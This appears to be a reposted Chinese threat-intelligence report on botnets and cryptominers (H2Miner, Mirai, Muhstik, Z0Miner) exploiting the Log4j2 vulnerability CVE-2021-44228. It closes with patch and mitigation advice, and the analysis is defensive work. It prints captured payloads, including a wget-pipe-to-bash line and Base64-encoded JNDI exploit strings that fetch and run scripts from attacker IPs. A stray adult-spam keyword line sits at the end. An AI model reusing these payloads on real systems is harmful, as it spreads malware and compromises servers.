<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Log4j2 RCE 漏洞的攻擊事件仍會持續增加

    VSole2021-12-13 15:34:58

    概述

    近日,Apache Log4j2被爆出遠程代碼執行高危漏洞(CVE-2021-44228),由于該模塊被廣泛應用在中間件、開發框架、Web應用中,涉及用戶群體大,并且漏洞危害性高,導致漏洞影響力巨大,幾乎波及各行各業。

    通過深信服云端數據監控,具有漏洞利用攻擊行為的數量爆發式增長,同時日志分析過程中發現H2Miner、Mirai、Muhstik、Z0Miner等多個黑產組織已將此漏洞利用融入了自身武器庫,預計未來一段時間內利用該漏洞的攻擊事件仍會持續增加。

    如下是云端近期攔截的攻擊日志趨勢:

    行業分布上,教育、政府、制造業等行業更易受到該漏洞利用攻擊的影響。被攻擊的行業分布如下:

    漏洞簡介

    漏洞名稱 : Apache Log4j2遠程代碼執行漏洞

    漏洞描述:Apache Log4j2遠程代碼執行漏洞漏洞是由于Apache Log4j2某些功能存在遞歸解析功能,攻擊者可利用該漏洞在未授權的情況下,構造惡意數據進行遠程代碼執行攻擊,最終獲取服務器最高權限。

    組件名稱 : Apache Log4j2

    影響范圍:

    2.0.0 ≤ Apache Log4j2 ≤ 2.15.0-rc1

    漏洞類型 : 遠程代碼執行

    利用條件 :

    1、用戶認證:不需要用戶認證

    2、前置條件:默認配置

    3、觸發方式:遠程

    利用難度:容易,無需授權即可遠程代碼執行。

    威脅等級:嚴重,能造成遠程代碼執行。

    詳細查閱:

    https://mp.weixin.qq.com/s/40vKowBxaf6XRAkR8Hdd9w

    云端事件監測

    截至目前,深信服威脅情報團隊監測到多起Apache Log4j2遠程代碼執行漏洞(CVE-2021-44228)利用事件,我們發現該漏洞已被多個黑產組織武器化,添加到自身的武器庫中以發起網絡攻擊,目前捕獲到H2Miner、Mirai、Muhstik、Z0Miner等病毒家族都已使用此漏洞進行攻擊。

    Apache Log4j2漏洞披露及黑產武器化時間線如圖:

    01 Mirai攻擊事件

    捕獲到的Mirai僵尸網絡使用Log4j2(CVE-2021-44228)漏洞的攻擊payload如下:

    payload經Base64解密后,內容如下:

    wget -q -O- http://62.210.130.xxx/lh.sh|bash

    經分析,lh.sh腳本為前置載荷,會下載執行Mirai的可執行文件,腳本文件內容如下:

    Mirai僵尸網絡整體攻擊流程如下:

    02 H2Miner攻擊事件

    捕獲到的H2Miner挖礦木馬使用Log4j2(CVE-2021-44228)漏洞的攻擊payload如下:

    80.71.158.xxx:5558/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL21tbS5zaHx8d2dldCAtcSAtTy0gODAuNzEuMTU4LjEyL21tbS5zaCl8YmFzaA==

    82.118.18.xxx:1534/Basic/Command/Base64/KGN1cmwgLXMgODIuMTE4LjE4LjIwMS9saC5zaHx8d2dldCAtcSAtTy0gODIuMTE4LjE4LjIwMS9saC5zaCl8YmFzaA==

    92.242.40.xxx:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5Mi4yNDIuNDAuMjEvbGguc2gpfGJhc2g=

    92.242.40.xxx:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoMi5zaHx8d2dldCAtcSAtTy0gOTIuMjQyLjQwLjIxL2xoMi5zaCl8c2g=

    payload經Base64解密后,內容如下:

    經分析,lh.sh/lh2.sh/mmm.sh均為H2Miner的前置加載腳本,負責下載執行后續挖礦和后門模塊,腳本文件內容如下:

    H2Miner挖礦木馬整體攻擊流程如下:

    03 Muhstik攻擊事件

    捕獲到的Muhstik僵尸網絡使用Log4j2(CVE-2021-44228)漏洞的攻擊payload內容如下:

    Exploit.class負責下載執行前置腳本log,經反編譯內容如下:

    前置腳本log負責下載后續其他惡意載荷,腳本內容如下:

    Muhstik僵尸網絡整體攻擊流程如下:

    04 Z0Miner攻擊事件

    捕獲到的Z0Miner挖礦木馬使用Log4j2(CVE-2021-44228)漏洞的攻擊payload內容如下:

    payload經Base64解密后,內容如下:

    總結

    漏洞是黑產發起攻擊的重要手段,尤其是0day或Nday漏洞已經成為僵尸網絡的常用套路,僵尸網絡為了更有效和廣泛的傳播,會在漏洞被披露的第一時間更新進武器庫。在本次漏洞事件中,Apache Log4j2漏洞因影響范圍巨大、利用門檻極低,不僅H2Miner、Muhstik、Mirai、Z0Miner已開始使用此漏洞,可以預見的是,未來還會有更多的攻擊組織將其加入武器庫進行網絡攻擊。

    另外,CVE、補丁和漏洞利用三者之間的時間間隔值得關注。Apache Log4j2被爆出遠程代碼執行高危漏洞,大多數的安全廠商開始開發他們的漏洞簽名和保護策略,同時大多數的攻擊者也開始嘗試利用這個漏洞。在這段攻擊人員與防護人員之間的博弈敏感期,誰能更快地作出響應,誰就能更好地占據先機。

    處置建議

    升級到最新版本

    當前官方已發布最新版本,建議受影響的用戶及時更新升級到最新版本。鏈接如下:

    https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

    臨時緩解措施

    (1)在項目啟動程序中添加System.setProperty("log4j2.formatMsgNoLookups", "true")(2)直接添加jvm啟動參數:Dlog4j2.formatMsgNoLookups=true;

    (3)在應用程序的classpath下添加log4j2.component.properties配置文件(文件名自定義),文件內容:log4j2.formatMsgNoLookups=True。

    僵尸網絡log4j
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    最近發現的一個開發中的僵尸網絡以Linux系統為目標。
    近日,Apache Log4j2被爆出遠程代碼執行高危漏洞(CVE-2021-44228),由于該模塊被廣泛應用在中間件、開發框架、Web應用中,涉及用戶群體大,并且漏洞危害性高,導致漏洞影響力巨大,幾乎波及各行各業。 通過深信服云端數據監控,具有漏洞利用攻擊行為的數量爆發式增長,同時日志分析過程中發現H2Miner、Mirai、Muhstik、Z0Miner等多個黑產組織已將此漏洞利用融入了自
    鑒于Apache Log4j2漏洞影響面巨大,奇安信專家建議各廠商加強對僵尸網絡、挖礦病毒、勒索軟件相關活動的監測與防御。
    微軟研究人員近日發現了一種同時針對 Windows 和 Linux 平臺的混合型僵尸網絡,該網絡使用一種高效的技術來攻擊《我的世界》服務器,并可在多個平臺上發起分布式拒絕服務攻擊。目前,MCCrash 的硬編碼顯示僅針對《我的世界》服務器軟件的 1.12.2 版本。
    安全研究員監測到部分僵尸網絡開始用Confluence漏洞擴大地盤,感染Linux服務器。
    微軟和Akamai日前各自發布的報告數據顯示,企圖利用Log4Shell漏洞的網絡犯罪分子正在攻擊SolarWinds和ZyXEL的設備,已知這些設備在其軟件中使用了Log4j庫。微軟表示,它發現威脅分子正在濫用Log4Shell以及SolarWinds Serv-U文件共享服務器中的零日漏洞。
    自上周五廣泛使用的 Java 日志庫 Log4J 曝出高危漏洞以來,黑客對全世界的企業發動了超過 84 萬次攻擊。Log4J 使用 Java Naming and Directory Interface 執行網絡查找,從 Lightweight Directory Access Protocol 獲得服務,它將日志消息作為 URL 處理,以主程序的完整權限執行其中包含的任何可執行負荷。它的漏洞很容
    近日,Apache Log4j 漏洞再次曝光3個高危漏洞,評級均在高危以上。 自2021年12月7日公開,Apache Log4j 漏洞被認為是“2021年最重要的安全威脅之一”,稱它為“核彈級”漏洞真的不是夸張。該漏洞被披露已有1個多月時間,我們一起來回顧下,這場“核爆炸”究竟帶來了哪些連鎖反應? 被披露僅1個多月時間,以CVE-2021-44228漏洞為起始點,Apache Log4j
    微軟警告說,威脅行為者繼續試圖在其活動中利用 Apache Log4J 漏洞在目標系統上部署惡意軟件。
    受影響范圍難以確定、缺乏可用補丁、第三方產品和服務可能暗含漏洞等難題的存在,導致Log4j漏洞緩解挑戰滿滿。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类